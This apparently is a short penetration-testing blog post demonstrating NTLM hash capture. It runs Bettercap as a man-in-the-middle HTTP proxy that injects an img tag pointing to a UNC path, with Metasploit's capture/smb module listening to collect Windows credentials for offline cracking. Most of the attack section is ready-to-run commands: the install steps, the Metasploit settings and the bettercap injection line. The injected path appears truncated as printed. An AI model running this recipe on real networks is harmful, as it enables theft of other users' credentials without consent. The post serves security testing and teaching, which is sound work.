Bettercap – Capturing NTLM Hashes

Share this…

As many of you who follow me on twitter will know, I’m a big fan of the Bettercap project. Created by @EvilSocket, this tool is a reimagining of the historic Ettercap project, bringing it up to date, it’s an invaluable tool for the penetration testing arsenal.

One of the many modules offered by the project is the HTTP Proxy module, which allows a man-in-the-middle to transparently proxy and modify HTTP traffic being returned to a user. While the possibilities are endless (1st April is coming up ;), one of the uses I have explored is the option of capturing Windows credentials from another user on the same network.

Due to the way in which Bettercap supports module development, there are endless ways to achieve this, but one simple and often fruitful resource used during assessments are SMB paths, and the Windows OS built in need to authenticate when it finds one.

For the purposes of demoing such an attack, a simple virtual lab environment was set up with the following layout:

Before we begin, we will need to install Bettercap on our Linux box. This is done by executing the following:

sudo apt-get install build-essential ruby-dev libpcap-dev
gem install bettercap

Once installed, we need to configure Metasploit to start an SMB NTLM authentication server to capture passed credentials:

use auxiliary/server/capture/smb
set JOHNPWFILE captured

Then we can start Bettercap to inject our IMG tag into passing HTTP traffic:

bettercap --proxy --proxy-module injecthtml --html-data "<img src='file://'/>" -T

When launched, Bettercap will add the image tag which contains a UNC path to our Metasploit instance. In turn, this will result in a vulnerable browser (such as Edge, or Internet Explorer) authenticating with the capture/smb Metasploit module, allowing us to dump the NTLM hash for offline bruteforcing.

Below is a quick video demonstrating this attack: